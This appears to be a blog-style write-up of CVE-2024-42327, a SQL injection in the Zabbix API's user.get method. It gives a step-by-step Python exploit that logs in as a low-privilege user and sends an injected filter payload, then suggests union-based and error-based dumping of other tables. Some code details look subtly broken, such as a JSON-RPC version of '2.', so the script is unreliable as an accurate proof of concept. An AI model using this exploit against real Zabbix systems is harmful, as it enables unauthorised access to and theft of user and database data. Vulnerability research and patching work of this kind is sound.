---
Introduction
Yet another major security hole has been found in the world of network monitoring—this time in Zabbix, the popular open-source platform used by enterprises around the globe. Assigned as CVE-2024-42327, this vulnerability allows any user with basic API access—even those with the default "User" role—to launch SQL injection attacks on the Zabbix backend.
The heart of the issue is a programming oversight in the CUser class, specifically within the addRelatedObjects method. With a carefully crafted API call, attackers can manipulate database queries, leak sensitive data, or even compromise the whole Zabbix database—all without needing admin credentials.
Root Cause
Zabbix’s "CUser.get" API method, used to retrieve user data, eventually calls the addRelatedObjects function in the backend PHP. This function inadequately sanitizes user-controllable input that gets interpolated into SQL queries. This leads to a situation where attackers can inject malicious SQL commands, a classic case of SQL Injection (SQLi).
Technical Breakdown
- Vulnerable File: /include/classes/api/services/CUser.php
Let's see a simplified version of how this looks
// CUser.php
public function addRelatedObjects(array &$users, array $options) {
// ... some code ...
$sql = 'SELECT ... FROM users WHERE ' . $options['filter']; // BAD!
// ...
}
Here, the contents of $options['filter'] can be influenced via the API, which means an attacker can inject arbitrary SQL.
2. Step-by-Step Exploitation
Even a low-privilege user (with just API rights) can weaponize this. Here’s a basic exploit scenario you can use for research or testing purposes (don’t use it for anything illegal).
Step 1: Authenticate and Get an API Token
import requests
url = "http://YOUR_ZABBIX_URL/api_jsonrpc.php";
auth_data = {
"jsonrpc": "2.",
"method": "user.login",
"params": {
"user": "lowprivuser",
"password": "password"
},
"id": 1
}
resp = requests.post(url, json=auth_data)
auth_token = resp.json()["result"]
print("Auth token:", auth_token)
Step 2: Trigger the SQL Injection with CUser.get
You can inject SQL in fields like filter or other input parameters, depending on how the endpoint passes these to the vulnerable function. A dangerous payload could be:
payload = {
"jsonrpc": "2.",
"method": "user.get",
"params": {
"output": ["userid", "alias"],
"filter": "' OR 1=1-- -" # The injected SQL
},
"auth": auth_token,
"id": 2
}
resp = requests.post(url, json=payload)
print(resp.text)
This payload tricks the backend into returning all users (ignoring normal filtering), and with more complex payloads, you could extract database metadata or sensitive data.
Step 3: Go Further
Advanced attackers could use error-based or union-based injections to dump other tables, adjust queries, or even execute writes if underlying permissions allow.
3. Impact & Severity
- Compromises confidentiality: All user info, keys, or other sensitive database data can be exfiltrated.
Severity: *Critical*
*Any authenticated, non-admin Zabbix user can potentially access or control the backend database.*
4. Mitigation
- Upgrade Zabbix to the patched version as soon as available or apply any relevant patches announced by the Zabbix security team (check the official Zabbix security advisories).
5. References & Further Reading
1. Zabbix bug tracker: ZBX-23916 (CVE-2024-42327)
2. Official Zabbix changelog
3. OWASP on SQL Injection
4. Exploit Database SQL Injection Tutorials
6. Conclusion
CVE-2024-42327 is a textbook example of why even "low-privilege" users should be treated with utmost care in web applications. If your Zabbix instance allows any non-admin users with API access, attackers could easily slip through and pillage your entire backend.
Patch immediately, restrict permissions, and always sanitize user input everywhere—yes, especially on internal APIs.
Stay safe, monitor logs, and keep your software up to date!
*This write-up is exclusive to your research—do not use these techniques for unauthorized testing.*
Timeline
Published on: 11/27/2024 12:15:20 UTC